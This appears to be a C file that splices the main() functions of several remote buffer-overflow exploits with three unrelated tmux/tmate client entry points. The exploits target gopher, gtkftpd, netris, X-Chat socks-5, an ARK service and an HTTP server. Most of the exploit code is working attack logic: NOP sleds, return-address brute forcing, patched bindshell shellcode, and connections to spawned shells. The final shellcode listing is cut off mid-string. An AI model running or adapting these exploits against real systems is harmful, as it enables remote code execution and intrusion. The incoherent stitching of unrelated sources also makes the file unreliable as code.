/* begin. */
/*
 * Entry point of the proof-of-concept driver described in the banner below.
 * argv[1] is the port to listen on, argv[2] optionally the bindshell port
 * (default DFL_BINDSHELL_PORT). The bindshell port is patched into
 * x86_exec[20..21], gopherd_bind() waits for a client, and getshell() is
 * then run against whichever host connected.
 *
 * Review notes: both ports go through atoi() with no range or syntax
 * check, so non-numeric input silently becomes 0 and values above 65535
 * are truncated to unsigned short; the sleep(3) is a fixed timing
 * assumption rather than synchronisation. x86_exec, DFL_BINDSHELL_PORT,
 * REPLACE_VI_ADDR, RET_ADDR, PLACEMENT_OFFSET, gopherd_bind() and
 * getshell() are expected to be defined elsewhere in the file (not
 * visible here).
 */
int main(int argc,char **argv){
    unsigned short port=0,sport=DFL_BINDSHELL_PORT;
    char *hostptr;
    printf("[*] gopher[v3.0.9+]: remote (client) buffer overflow exp"
    "loit.\n[*] by: vade79/v9 [email protected] (fakehalo/realhalo)\n\n");
    if(argc<2){
        printf("[!] syntax: %s <port> [bindshell port]\n",argv[0]);
        exit(1);
    }
    /* no validation: atoi() returns 0 for junk, wider values truncate. */
    port=atoi(argv[1]);
    if(argc>2)sport=atoi(argv[2]);
    /* set the port to bind to in the shellcode. */
    x86_exec[20]=(sport&0xff00)>>8;
    x86_exec[21]=(sport&0x00ff);
    /* verbose values display. */
    printf("[*] replacement \"vi\" address\t\t: 0x%.8x\n",REPLACE_VI_ADDR);
    printf("[*] return address\t\t\t: 0x%.8x\n",RET_ADDR);
    printf("[*] offset from the end of tmpstr[]\t: %d (=%d)\n",
    PLACEMENT_OFFSET,PLACEMENT_OFFSET*4);
    printf("[*] server port\t\t\t\t: %u\n",port);
    printf("[*] bindshell port\t\t\t: %u\n\n",sport);
    /* wait for a connection and send overflow. */
    hostptr=gopherd_bind(port);
    /* be safe, and give it time to run. */
    sleep(3);
    /* see if a shell spawned. */
    getshell(hostptr,sport);
    exit(0);
}
/*
 * FTP-side driver of this proof of concept, run over an already connected
 * socket. It logs in with the global user/pass, changes into writedir,
 * creates its own base directory (getbdir()) and then loops over candidate
 * offsets up to attempts*400: each pass creates a directory named by
 * getdir(offset), issues a LIST with getcode(), removes the directory
 * again and calls getshell(sock,offset). Finally ftp_clean() is run and
 * the socket is closed.
 *
 * Review notes: user, pass, writedir, basedir, attempts, reverse and
 * baseaddr are globals defined elsewhere in the file (not visible here).
 * Nothing returned by ftp_read()/ftp_printf() is inspected, so if they
 * report a dropped connection the loop keeps issuing commands; the
 * sleep(1) calls are fixed timing assumptions. The null-byte/CR test
 * only looks at the low byte of the candidate address, as the original
 * comment says.
 */
void ftp_parse(int sock){
    unsigned int offset=0;
    ftp_read(sock); /* get the banner. */
    ftp_printf(sock,"USER %s\r\n",user);
    ftp_read(sock);
    ftp_printf(sock,"PASS %s\r\n",pass);
    ftp_read(sock);
    ftp_printf(sock,"CWD %s\r\n",writedir);
    ftp_read(sock);
    basedir=getbdir(); /* tmp dir of our own to use. */
    ftp_printf(sock,"MKD %s\r\n",basedir);
    ftp_read(sock);
    ftp_printf(sock,"CWD %s\r\n",basedir);
    ftp_read(sock);
    while(offset<(attempts*400)){ /* if it hasn't yet, it's not going to. */
        /* slight null-byte/CR check, only needs to check the last byte. */
        if((!reverse&&!((baseaddr-offset)&0xff))||(reverse&&!((baseaddr+offset)
        &0xff))||(!reverse&&((baseaddr-offset)&0xff)=='\n')||(reverse&&
        ((baseaddr+offset)&0xff)=='\n')){
            printf("[!] brute address contains null-byte/CR, increasing offset "
            "by one byte.\n");
            offset++; /* one byte off if reversed won't hurt here. (401) */
        }
        /* make the evil oversized directory. (255 or less bytes) */
        ftp_printf(sock,"MKD %s\r\n",getdir(offset));
        ftp_read(sock);
        /* date+directory exceeds 256 byte buffer, the exploit. */
        sleep(1); /* delay insurance. */
        ftp_printf(sock,"LIST -%s\r\n",getcode());
        /* nothing to read here, and gtkftpd processes (the exploit) */
        /* before the ftp list connection is made, making it */
        /* pointless to view the list. */
        sleep(1); /* delay insurance, again, just to be sure. */
        /* delete directory, multiples will cause failure(s). */
        ftp_printf(sock,"RMD %s\r\n",getdir(offset));
        ftp_read(sock);
        getshell(sock,offset);
        offset+=400; /* always at least 400 nops in a row, in shellcode. */
    }
    ftp_clean(sock);
    close(sock);
    return;
}
/*
 * Entry point of the netris proof of concept named in the banner. argv[1]
 * is either a host to connect to or "-b" to listen locally instead;
 * argv[2] optionally overrides the port (default DFLPORT). After the
 * connection has been handled it sleeps one second and calls getshell()
 * on hostptr with port 45295, which the comment says is fixed in the
 * shellcode.
 *
 * Review notes: the port is parsed with atoi() and never range-checked.
 * DFLPORT, netris_bind(), netris_connect() and getshell() are expected to
 * be defined elsewhere in the file (not visible here).
 */
int main(int argc,char **argv){
    unsigned short isbind=0,nport=DFLPORT; /* default. */
    char *hostptr;
    printf("[*] netris[v0.5-]: client/server remote buffer overflow ex"
    "ploit.\n[*] by: vade79/v9 [email protected] (fakehalo)\n\n");
    if(argc<2){
        printf("[!] syntax: %s <host|-b> [port]\n",argv[0]);
        exit(1);
    }
    if(!strcmp(argv[1],"-b")) isbind=1;
    if(argc>2) nport=atoi(argv[2]);
    /* bind mode: hostptr is whoever connected; connect mode: argv[1]. */
    if(isbind) hostptr=netris_bind(nport);
    else netris_connect((hostptr=argv[1]),nport);
    sleep(1);
    getshell(hostptr,45295); /* defined in shellcode. */
    exit(0);
}
/*
 * Entry point of the X-Chat socks-5 proof of concept named in the banner.
 * argv[1] is an offset subtracted from BSEADDR to form retaddr; argv[2]
 * and argv[3] optionally override the socks-5 listen port and the
 * bindshell port, the latter being patched into x86_exec[20..21].
 * socks5_bind() waits for a client and getshell() is then run against
 * the host that connected.
 *
 * Review notes: the BUFSIZE test compares a compile-time constant, so it
 * can only ever fire for a build of a file that defines BUFSIZE out of
 * range; all three numeric arguments go through atoi() unvalidated; the
 * `if(argc>1)` guard is always true once the argc<2 check has passed.
 * DFLPORT, DFLSPRT, BSEADDR, BUFSIZE, printe(), x86_exec, socks5_bind()
 * and getshell() are defined elsewhere in the file (not visible here).
 */
int main(int argc,char **argv){
    unsigned short port=DFLPORT,sport=DFLSPRT;
    unsigned int retaddr=BSEADDR;
    char *hostptr;
    if(BUFSIZE<0||BUFSIZE>255)printe("BUFSIZE must be 1-255(char/int8).",1);
    printf("[*] X-Chat[v1.8.0-v2.0.8]: socks-5 remote buffer overflow exp"
    "loit.\n[*] by: by: vade79/v9 v9 fakehalo deadpig org (fakehalo)\n\n");
    if(argc<2){
        printf("[!] syntax: %s <offset from 0x%.8x> [port] [shell port]\n\n",
        argv[0],BSEADDR);
        exit(1);
    }
    /* argc>1 is guaranteed here; the test is redundant. */
    if(argc>1)retaddr-=atoi(argv[1]);
    if(argc>2)port=atoi(argv[2]);
    if(argc>3)sport=atoi(argv[3]);
    x86_exec[20]=(sport&0xff00)>>8;
    x86_exec[21]=(sport&0x00ff);
    printf("[*] eip: 0x%.8x, socks-5 port: %u, bindshell port: %u.\n",
    retaddr,port,sport);
    hostptr=socks5_bind(port,retaddr);
    sleep(1);
    getshell(hostptr,sport);
    exit(0);
}
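/*
 * Client entry point (tmux 1.x era). Parses the command line, derives the
 * UTF-8 flag from the locale environment, builds the global environment
 * and the server/session/window option trees, locates the configuration
 * file and the server socket path, then hands control to client_main(),
 * which does not return.
 *
 * Changes from the original: the configuration path is only built when a
 * home directory could actually be determined (the original passed a
 * possibly NULL `home` to an "%s" conversion), and a socket path that does
 * not fit in socket_path[] is now rejected instead of being silently
 * truncated and then used.
 *
 * Exits with the status of client_main(), 0 after -V, or 1 on a fatal
 * setup error (socket path unavailable or too long).
 */
int
main(int argc, char **argv)
{
	struct passwd	*pw;
	char		*s, *path, *label, *home, **var;
	int		 opt, flags, quiet, keys;

#if defined(DEBUG) && defined(__OpenBSD__)
	malloc_options = (char *) "AFGJPX";
#endif

	flags = IDENTIFY_256COLOURS | IDENTIFY_UTF8;
	quiet = 0;
	label = path = NULL;
	login_shell = (**argv == '-');
	while ((opt = getopt(argc, argv, "28c:Cdf:lL:qS:uUvV")) != -1) {
		switch (opt) {
		case '2':
			flags |= IDENTIFY_256COLOURS;
			flags &= ~IDENTIFY_88COLOURS;
			break;
		case '8':
			flags |= IDENTIFY_88COLOURS;
			flags &= ~IDENTIFY_256COLOURS;
			break;
		case 'c':
			free(shell_cmd);
			shell_cmd = xstrdup(optarg);
			break;
		case 'C':
			/* A second -C upgrades control mode to termios mode. */
			if (flags & IDENTIFY_CONTROL)
				flags |= IDENTIFY_TERMIOS;
			else
				flags |= IDENTIFY_CONTROL;
			break;
		case 'V':
			printf("%s %s\n", __progname, VERSION);
			exit(0);
		case 'f':
			free(cfg_file);
			cfg_file = xstrdup(optarg);
			break;
		case 'l':
			login_shell = 1;
			break;
		case 'L':
			free(label);
			label = xstrdup(optarg);
			break;
		case 'q':
			quiet = 1;
			break;
		case 'S':
			free(path);
			path = xstrdup(optarg);
			break;
		case 'u':
			flags |= IDENTIFY_UTF8;
			break;
		case 'v':
			debug_level++;
			break;
		default:
			/* Also reached for -d and -U, which have no case. */
			usage();
		}
	}
	argc -= optind;
	argv += optind;

	/* -c takes the whole command; positional arguments are an error. */
	if (shell_cmd != NULL && argc != 0)
		usage();

	if (!(flags & IDENTIFY_UTF8)) {
		/*
		 * If the user has set whichever of LC_ALL, LC_CTYPE or LANG
		 * exist (in that order) to contain UTF-8, it is a safe
		 * assumption that either they are using a UTF-8 terminal, or
		 * if not they know that output from UTF-8-capable programs may
		 * be wrong.
		 *
		 * NOTE(review): flags is initialised with IDENTIFY_UTF8 set
		 * and nothing above clears it, so this branch looks
		 * unreachable unless the IDENTIFY_* masks overlap -- confirm.
		 */
		if ((s = getenv("LC_ALL")) == NULL || *s == '\0') {
			if ((s = getenv("LC_CTYPE")) == NULL || *s == '\0')
				s = getenv("LANG");
		}
		if (s != NULL && (strcasestr(s, "UTF-8") != NULL ||
		    strcasestr(s, "UTF8") != NULL))
			flags |= IDENTIFY_UTF8;
	}

	/* Seed the global environment from the process environment. */
	environ_init(&global_environ);
	for (var = environ; *var != NULL; var++)
		environ_put(&global_environ, *var);

	options_init(&global_options, NULL);
	options_table_populate_tree(server_options_table, &global_options);
	options_set_number(&global_options, "quiet", quiet);

	options_init(&global_s_options, NULL);
	options_table_populate_tree(session_options_table, &global_s_options);
	options_set_string(&global_s_options, "default-shell", "%s", getshell());

	options_init(&global_w_options, NULL);
	options_table_populate_tree(window_options_table, &global_w_options);

	/* Enable UTF-8 if the first client is on UTF-8 terminal. */
	if (flags & IDENTIFY_UTF8) {
		options_set_number(&global_s_options, "status-utf8", 1);
		options_set_number(&global_s_options, "mouse-utf8", 1);
		options_set_number(&global_w_options, "utf8", 1);
	}

	/* Override keys to vi if VISUAL or EDITOR are set. */
	if ((s = getenv("VISUAL")) != NULL || (s = getenv("EDITOR")) != NULL) {
		/* Only the basename of the editor is inspected. */
		if (strrchr(s, '/') != NULL)
			s = strrchr(s, '/') + 1;
		if (strstr(s, "vi") != NULL)
			keys = MODEKEY_VI;
		else
			keys = MODEKEY_EMACS;
		options_set_number(&global_s_options, "status-keys", keys);
		options_set_number(&global_w_options, "mode-keys", keys);
	}

	/* Locate the configuration file. */
	if (cfg_file == NULL) {
		home = getenv("HOME");
		if (home == NULL || *home == '\0') {
			pw = getpwuid(getuid());
			if (pw != NULL)
				home = pw->pw_dir;
		}
		/*
		 * With no HOME and no passwd entry there is nowhere to look;
		 * leave cfg_file NULL rather than formatting a NULL pointer.
		 */
		if (home != NULL) {
			xasprintf(&cfg_file, "%s/%s", home, DEFAULT_CFG);
			if (access(cfg_file, R_OK) != 0 && errno == ENOENT) {
				free(cfg_file);
				cfg_file = NULL;
			}
		}
	}

	/*
	 * Figure out the socket path. If specified on the command-line with -S
	 * or -L, use it, otherwise try $TMUX or assume -L default.
	 */
	parseenvironment();
	if (path == NULL) {
		/* If no -L, use the environment. */
		if (label == NULL) {
			if (environ_path != NULL)
				path = xstrdup(environ_path);
		}

		/* -L or default set. */
		if (!path) {
			if ((path = makesocketpath(label)) == NULL) {
				fprintf(stderr, "can't create socket\n");
				exit(1);
			}
		}
	}
	free(label);

	/* A truncated socket path would silently address the wrong server. */
	if (strlcpy(socket_path, path, sizeof socket_path) >=
	    sizeof socket_path) {
		fprintf(stderr, "socket path too long: %s\n", path);
		exit(1);
	}
	free(path);

#ifdef HAVE_SETPROCTITLE
	/* Set process title. */
	setproctitle("%s (%s)", __progname, socket_path);
#endif

	/* Pass control to the client. */
	ev_base = osdep_event_init();
	exit(client_main(argc, argv, flags));
}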
/*
 * Client entry point (tmate build of tmux). Parses the command line,
 * decides whether the client is UTF-8, builds the global hooks,
 * environment (including PWD from getcwd()) and the three option trees,
 * resolves the server socket path from -S, -L, $TMUX or make_label() and
 * hands control to client_main(), which does not return.
 *
 * Notes: under TMATE the 256-colour and UTF-8 client flags are forced on
 * before option parsing, regardless of the locale. -d and -U are in the
 * getopt string but have no case and therefore fall into usage(); -q is
 * accepted and ignored. On OpenBSD the process is restricted with
 * pledge() before any option tree is created.
 */
int
main(int argc, char **argv)
{
	char		*path, *label, **var, tmp[PATH_MAX], *shellcmd = NULL;
	const char	*s;
	int		 opt, flags, keys;

#if defined(DEBUG) && defined(__OpenBSD__)
	malloc_options = (char *) "AFGJPX";
#endif

	setlocale(LC_TIME, "");
	tzset();

	/* A leading '-' in argv[0] means we were started as a login shell. */
	if (**argv == '-')
		flags = CLIENT_LOGIN;
	else
		flags = 0;

#ifdef TMATE
	tmate_catch_sigsegv();
	flags |= CLIENT_256COLOURS | CLIENT_UTF8;
#endif

	label = path = NULL;
	while ((opt = getopt(argc, argv, "2c:Cdf:lL:qS:uUVv")) != -1) {
		switch (opt) {
		case '2':
			flags |= CLIENT_256COLOURS;
			break;
		case 'c':
			free(shellcmd);
			shellcmd = xstrdup(optarg);
			break;
		case 'C':
			/* A second -C upgrades control mode to control-control. */
			if (flags & CLIENT_CONTROL)
				flags |= CLIENT_CONTROLCONTROL;
			else
				flags |= CLIENT_CONTROL;
			break;
		case 'V':
			printf("%s %s\n", __progname, VERSION);
			exit(0);
		case 'f':
			set_cfg_file(optarg);
			break;
		case 'l':
			flags |= CLIENT_LOGIN;
			break;
		case 'L':
			free(label);
			label = xstrdup(optarg);
			break;
		case 'q':
			break;
		case 'S':
			free(path);
			path = xstrdup(optarg);
			break;
		case 'u':
			flags |= CLIENT_UTF8;
			break;
		case 'v':
			log_add_level();
			break;
		default:
			usage();
		}
	}
	argc -= optind;
	argv += optind;

	/* -c takes the whole command; positional arguments are an error. */
	if (shellcmd != NULL && argc != 0)
		usage();

#ifdef __OpenBSD__
	if (pledge("stdio rpath wpath cpath flock fattr unix getpw sendfd "
	    "recvfd proc exec tty ps", NULL) != 0)
		err(1, "pledge");
#endif

	/*
	 * tmux is a UTF-8 terminal, so if TMUX is set, assume UTF-8.
	 * Otherwise, if the user has set LC_ALL, LC_CTYPE or LANG to contain
	 * UTF-8, it is a safe assumption that either they are using a UTF-8
	 * terminal, or if not they know that output from UTF-8-capable
	 * programs may be wrong.
	 */
	if (getenv("TMUX") != NULL)
		flags |= CLIENT_UTF8;
	else {
		s = getenv("LC_ALL");
		if (s == NULL || *s == '\0')
			s = getenv("LC_CTYPE");
		if (s == NULL || *s == '\0')
			s = getenv("LANG");
		if (s == NULL || *s == '\0')
			s = "";
		if (strcasestr(s, "UTF-8") != NULL ||
		    strcasestr(s, "UTF8") != NULL)
			flags |= CLIENT_UTF8;
	}

	global_hooks = hooks_create(NULL);

	/* Seed the global environment from the process environment. */
	global_environ = environ_create();
	for (var = environ; *var != NULL; var++)
		environ_put(global_environ, *var);
	if (getcwd(tmp, sizeof tmp) != NULL)
		environ_set(global_environ, "PWD", "%s", tmp);

	global_options = options_create(NULL);
	options_table_populate_tree(OPTIONS_TABLE_SERVER, global_options);

	global_s_options = options_create(NULL);
	options_table_populate_tree(OPTIONS_TABLE_SESSION, global_s_options);
	options_set_string(global_s_options, "default-shell", "%s", getshell());

	global_w_options = options_create(NULL);
	options_table_populate_tree(OPTIONS_TABLE_WINDOW, global_w_options);

	/* Override keys to vi if VISUAL or EDITOR are set. */
	if ((s = getenv("VISUAL")) != NULL || (s = getenv("EDITOR")) != NULL) {
		/* Only the basename of the editor is inspected. */
		if (strrchr(s, '/') != NULL)
			s = strrchr(s, '/') + 1;
		if (strstr(s, "vi") != NULL)
			keys = MODEKEY_VI;
		else
			keys = MODEKEY_EMACS;
		options_set_number(global_s_options, "status-keys", keys);
		options_set_number(global_w_options, "mode-keys", keys);
	}

	/*
	 * If socket is specified on the command-line with -S or -L, it is
	 * used. Otherwise, $TMUX is checked and if that fails "default" is
	 * used.
	 */
	if (path == NULL && label == NULL) {
		s = getenv("TMUX");
		if (s != NULL && *s != '\0' && *s != ',') {
			/* $TMUX is "path,pid,index"; keep only the path. */
			path = xstrdup(s);
			path[strcspn (path, ",")] = '\0';
		}
	}
	if (path == NULL && (path = make_label(label)) == NULL) {
		fprintf(stderr, "can't create socket: %s\n", strerror(errno));
		exit(1);
	}
	socket_path = path;
	free(label);

	/* Pass control to the client. */
	exit(client_main(event_init(), argc, argv, flags, shellcmd));
}
/*
 * Entry point of the proof of concept for the service on ARK_PORT. Usage
 * is `<host> <target number>`; the 1-based target number selects an entry
 * of targets[] (targret/targsafe). Two connections are opened with
 * isock(): the first receives the nop+shellcode buffer, the second the
 * header followed by the data buffer. After a fixed sleep a third
 * connection to SHELL_PORT is handed to getshell().
 *
 * Review notes: tnum is unsigned, so a negative argv[2] wraps to a large
 * value and is rejected by the `> NUMTARGS` test only incidentally; the
 * isock() results are used without any error check and no write() return
 * value is inspected; the length is copied into head[6..7] as the first
 * two bytes of an int object after ntohs(), so the bytes actually placed
 * depend on host endianness; `addr` is never used; `host` is only assigned
 * when argc == 3, so the code relies on usage() not returning. main() has
 * no return statement. LEN, ARK_PORT, NUMTARGS, NOP_LEN, HEAD_LEN,
 * SHELL_PORT, targets[], shellcode, isock(), usage() and getshell() are
 * defined elsewhere in the file (not visible here).
 */
int main( int argc, char **argv) {
    /* first 2 bytes are a type 74 request */
    /* last two bytes length */
    char head[] = "\x00\x4a\x00\x03\x00\x01\xff\xff";
    char data[512];
    char sc_req[20000];
    char *host;
    unsigned int tnum;
    unsigned int safeaddr;
    unsigned int ret;
    int datalen = LEN;
    int port = ARK_PORT;
    unsigned int addr = 0;
    int sock_overflow, sock_nops, sock_shell;
    int i;

    if (argc == 3) {
        host = argv[1];
        tnum = atoi(argv[2]);
        if (tnum > NUMTARGS || tnum == 0) {
            fprintf(stderr, "[!] Invalid target\n");
            usage(argv[0]);
        }
    } else {
        usage(argv[0]);
    }

    /* convert the 1-based user-facing target number to an index. */
    tnum--;
    ret = targets[tnum].targret;
    safeaddr = targets[tnum].targsafe;

    sock_overflow = sock_nops = sock_shell = 0;
    sock_nops = isock(host, port);
    sock_overflow = isock(host, port);

    // build data section of overflow packet
    memset(data, 0x90, datalen);
    for (i = 0; i < datalen; i += 4)
        memcpy(data+i, (char *)&ret, 4);

    // we overwrite a pointer that must be a valid address
    memcpy(data+datalen-12, (char *)&safeaddr, 4);

    // build header of overflow packet
    datalen = ntohs(datalen);
    memcpy(head+6, (char *)&datalen, 2);

    // build invalid packet with nops+shellcode
    memset(sc_req, 0x90, NOP_LEN+1);
    memcpy(sc_req+NOP_LEN, shellcode, sizeof(shellcode));

    // send invalid nop+shellcode packet
    fprintf(stderr, "[*] Sending nops+shellcode\n");
    write(sock_nops, sc_req, NOP_LEN+sizeof(shellcode));
    fprintf(stderr, "[*] Done, sleeping\n");
    sleep(1);
    close(sock_nops);

    // send overflow
    fprintf(stderr, "[*] Sending overflow\n");
    write(sock_overflow, head, HEAD_LEN);
    write(sock_overflow, data, LEN);
    fprintf(stderr, "[*] Done\n");
    fprintf(stderr, "[*] Sleeping and connecting remote shell\n");
    sleep (1);
    close(sock_overflow);

    // connect to shell
    sock_shell = isock(host, SHELL_PORT);
    fprintf(stderr, "[*] Success, enjoy\n");
    getshell(sock_shell);
}
/*
 * Client entry point (tmux 1.9/2.0 era). Parses the command line, derives
 * CLIENT_UTF8 from LC_ALL/LC_CTYPE/LANG when -u was not given, builds the
 * global environment (including PWD from getcwd()) and the three option
 * trees, resolves the server socket path from -S, -L, $TMUX or the
 * "default" label, copies it into socket_path[] with a truncation check
 * and hands control to client_main(), which does not return.
 *
 * Notes: -d and -U are in the getopt string but have no case and fall
 * into usage(); -q is accepted and ignored. An empty $TMUX value is
 * treated like an unset one and falls back to the "default" label.
 */
int
main(int argc, char **argv)
{
	char	*s, *path, *label, **var, tmp[PATH_MAX];
	int	 opt, flags, keys;

#if defined(DEBUG) && defined(__OpenBSD__)
	malloc_options = (char *) "AFGJPX";
#endif

	setlocale(LC_TIME, "");

	/* A leading '-' in argv[0] means we were started as a login shell. */
	if (**argv == '-')
		flags = CLIENT_LOGIN;
	else
		flags = 0;

	label = path = NULL;
	while ((opt = getopt(argc, argv, "2c:Cdf:lL:qS:uUVv")) != -1) {
		switch (opt) {
		case '2':
			flags |= CLIENT_256COLOURS;
			break;
		case 'c':
			free(shell_cmd);
			shell_cmd = xstrdup(optarg);
			break;
		case 'C':
			/* A second -C upgrades control mode to control-control. */
			if (flags & CLIENT_CONTROL)
				flags |= CLIENT_CONTROLCONTROL;
			else
				flags |= CLIENT_CONTROL;
			break;
		case 'V':
			printf("%s %s\n", __progname, VERSION);
			exit(0);
		case 'f':
			set_cfg_file(optarg);
			break;
		case 'l':
			flags |= CLIENT_LOGIN;
			break;
		case 'L':
			free(label);
			label = xstrdup(optarg);
			break;
		case 'q':
			break;
		case 'S':
			free(path);
			path = xstrdup(optarg);
			break;
		case 'u':
			flags |= CLIENT_UTF8;
			break;
		case 'v':
			debug_level++;
			break;
		default:
			usage();
		}
	}
	argc -= optind;
	argv += optind;

	/* -c takes the whole command; positional arguments are an error. */
	if (shell_cmd != NULL && argc != 0)
		usage();

	if (!(flags & CLIENT_UTF8)) {
		/*
		 * If the user has set whichever of LC_ALL, LC_CTYPE or LANG
		 * exist (in that order) to contain UTF-8, it is a safe
		 * assumption that either they are using a UTF-8 terminal, or
		 * if not they know that output from UTF-8-capable programs may
		 * be wrong.
		 */
		if ((s = getenv("LC_ALL")) == NULL || *s == '\0') {
			if ((s = getenv("LC_CTYPE")) == NULL || *s == '\0')
				s = getenv("LANG");
		}
		if (s != NULL && (strcasestr(s, "UTF-8") != NULL ||
		    strcasestr(s, "UTF8") != NULL))
			flags |= CLIENT_UTF8;
	}

	/* Seed the global environment from the process environment. */
	environ_init(&global_environ);
	for (var = environ; *var != NULL; var++)
		environ_put(&global_environ, *var);
	if (getcwd(tmp, sizeof tmp) != NULL)
		environ_set(&global_environ, "PWD", tmp);

	options_init(&global_options, NULL);
	options_table_populate_tree(server_options_table, &global_options);

	options_init(&global_s_options, NULL);
	options_table_populate_tree(session_options_table, &global_s_options);
	options_set_string(&global_s_options, "default-shell", "%s", getshell());

	options_init(&global_w_options, NULL);
	options_table_populate_tree(window_options_table, &global_w_options);

	/* Enable UTF-8 if the first client is on UTF-8 terminal. */
	if (flags & CLIENT_UTF8) {
		options_set_number(&global_s_options, "status-utf8", 1);
		options_set_number(&global_s_options, "mouse-utf8", 1);
		options_set_number(&global_w_options, "utf8", 1);
	}

	/* Override keys to vi if VISUAL or EDITOR are set. */
	if ((s = getenv("VISUAL")) != NULL || (s = getenv("EDITOR")) != NULL) {
		/* Only the basename of the editor is inspected. */
		if (strrchr(s, '/') != NULL)
			s = strrchr(s, '/') + 1;
		if (strstr(s, "vi") != NULL)
			keys = MODEKEY_VI;
		else
			keys = MODEKEY_EMACS;
		options_set_number(&global_s_options, "status-keys", keys);
		options_set_number(&global_w_options, "mode-keys", keys);
	}

	/*
	 * Figure out the socket path. If specified on the command-line with -S
	 * or -L, use it, otherwise try $TMUX or assume -L default.
	 */
	if (path == NULL) {
		/* If no -L, use the environment. */
		if (label == NULL) {
			s = getenv("TMUX");
			if (s != NULL) {
				/* $TMUX is "path,pid,index"; keep only the path. */
				path = xstrdup(s);
				path[strcspn (path, ",")] = '\0';
				if (*path == '\0') {
					free(path);
					label = xstrdup("default");
				}
			} else
				label = xstrdup("default");
		}

		/* -L or default set. */
		if (label != NULL) {
			if ((path = makesocketpath(label)) == NULL) {
				fprintf(stderr, "can't create socket: %s\n",
				    strerror(errno));
				exit(1);
			}
		}
	}
	free(label);

	/* A truncated path would silently address the wrong socket. */
	if (strlcpy(socket_path, path, sizeof socket_path) >= sizeof socket_path) {
		fprintf(stderr, "socket path too long: %s\n", path);
		exit(1);
	}
	free(path);

#ifdef HAVE_SETPROCTITLE
	/* Set process title. */
	setproctitle("%s (%s)", __progname, socket_path);
#endif

	/* Pass control to the client. */
	exit(client_main(event_init(), argc, argv, flags));
}
/*
 * Entry point of this proof of concept against an HTTP service. Options:
 * -t/-T target index into __pl_form[] (must be < 6), -h/-H host (default
 * D_HOST, which is also treated as "no host given"), -p/-P port (default
 * D_PORT), -i/-I prints a hint and exits. A GET request is formatted into
 * sendbuf from buf and buf2, sent with a single write(), and getshell()
 * is then run against port 26112.
 *
 * Review notes: retaddr is a u_long but printed with %p (format/argument
 * mismatch); the sock_connect() result and the write() return value are
 * not checked; `i` is unused; -x/-X are in the getopt string but have no
 * case and are silently ignored because the switch has no default; the
 * `< 6` test on -t accepts negative values since atoi() returns a signed
 * int; the snprintf() bound 1024 is a literal not tied to sizeof sendbuf
 * while write() sends BUFSIZE3 bytes. D_PORT, D_HOST, BUFSIZE*, __pl_form,
 * shell, banrl(), x_fp_rm_usage(), sock_connect() and getshell() are
 * defined elsewhere in the file (not visible here).
 */
int main(int argc,char *argv[]) {
    int port=D_PORT;
    char hostname[0x333]=D_HOST;
    int whlp,type=0;
    unsigned int i=0;
    char buf[BUFSIZE+1];
    char buf2[BUFSIZE2+1];
    char sendbuf[BUFSIZE3+1];
    int sd;
    u_long retaddr=__pl_form[type].retaddr;
    (void)banrl();
    while((whlp=getopt(argc,argv,"T:t:H:h:P:p:IiXx"))!=EOF) {
        extern char *optarg;
        switch(whlp) {
        case 'T': case 't':
            /* only the upper bound is checked; negatives slip through. */
            if((type=atoi(optarg))<6) { retaddr=__pl_form[type].retaddr; }
            else (void)x_fp_rm_usage(argv[0]);
            break;
        case 'H': case 'h':
            memset((char *)hostname,0,sizeof(hostname));
            strncpy(hostname,optarg,sizeof(hostname)-1);
            break;
        case 'P': case 'p':
            port=atoi(optarg);
            break;
        case 'I': case 'i':
            fprintf(stderr," Try `%s -?' for more information.\n\n",argv[0]);
            exit(-1);
        case '?':
            (void)x_fp_rm_usage(argv[0]);
            break;
        }
    }
    /* D_HOST doubles as the "no host given" sentinel. */
    if(!strcmp(hostname,D_HOST)) { (void)x_fp_rm_usage(argv[0]); }
    {
        fprintf(stdout," [+] Hostname: %s\n",hostname);
        fprintf(stdout," [+] Port num: %d\n",port);
        fprintf(stdout," [+] Retaddr address: %p\n",retaddr);
    }
    fprintf(stdout," [1] #1 Set codes.\n");
    memset(buf, 0x90, BUFSIZE);
    memcpy(&buf[BUFSIZE-(sizeof(retaddr))], &retaddr, sizeof(retaddr));
    memset(buf2,0x90,88);
    memcpy(buf2+88,shell, sizeof(shell));
    snprintf(sendbuf,1024,"GET %s /HTTP/1.0\r\nUser-Agent: %s\r\n\r\n",buf,buf2);
    fprintf(stdout," [1] #1 Set socket.\n");
    sd=sock_connect(hostname,port);
    fprintf(stdout," [1] #1 Send codes.\n");
    write(sd,sendbuf,BUFSIZE3);
    close(sd);
    sleep(1);
    fprintf(stdout," [1] #3 Get shell.\n");
    getshell(hostname,26112);
    exit(0);
}
/*
 * Entry point of this proof of concept. Options: -r/-R and -s/-S override
 * retloc/retaddr (strtoul, base auto-detected), -h/-H host (default HOST),
 * -p/-P port (default PORT). It assembles atk_chunk and code_128len into
 * ttatk_code, sends that buffer twice over setsock() connections to
 * hostname:port, sleeps, then connects to hostname:36864 and hands the
 * socket to getshell().
 *
 * Review notes: retloc/retaddr default from pl_form[target_type_number]
 * with target_type_number fixed at 0 and no option to change it;
 * `strncpy(hostname,optarg,0x82)` copies the full buffer size so an
 * 0x82-byte argument leaves hostname unterminated; `strlen(x82_16x0x)` is
 * called on a 16-byte array with no terminator and reads out of bounds;
 * the `*(long*)` stores step by 4 bytes and therefore assume a 32-bit
 * long (on LP64 each store writes 8 bytes); send() return values are not
 * checked; x0x_size, debug_test, nop_n_jump, p_rev_size and size_fd are
 * never read. PORT, HOST, pl_form, banrl(), usage(), setsock(),
 * re_conenter() and getshell() are defined elsewhere in the file (not
 * visible here).
 */
int main(int argc,char *argv[]) {
    int at_sock;
    int ts_sock;
    int port=PORT;
    int roup;
    char ttatk_code[36864];
    char hostname[0x82]=HOST;
    char main_str[] = /* BIND SHELL ON PORT TCP/36864 */
    //------------------- main: -------------------//
    "\xeb\x72" /* jmp callz */
    //------------------- start: ------------------//
    "\x5e" /* popl %esi */
    //------------------ socket() -----------------//
    "\x29\xc0" /* subl %eax, %eax */
    "\x89\x46\x10" /* movl %eax, 0x10(%esi) */
    "\x40" /* incl %eax */
    "\x89\xc3" /* movl %eax, %ebx */
    "\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */
    "\x40" /* incl %eax */
    "\x89\x46\x08" /* movl %eax, 0x08(%esi) */
    "\x8d\x4e\x08" /* leal 0x08(%esi), %ecx */
    "\xb0\x66" /* movb $0x66, %al */
    "\xcd\x80" /* int $0x80 */
    //------------------- bind() ------------------//
    "\x43" /* incl %ebx */
    "\xc6\x46\x10\x10" /* movb $0x10, 0x10(%esi) */
    "\x66\x89\x5e\x14" /* movw %bx, 0x14(%esi) */
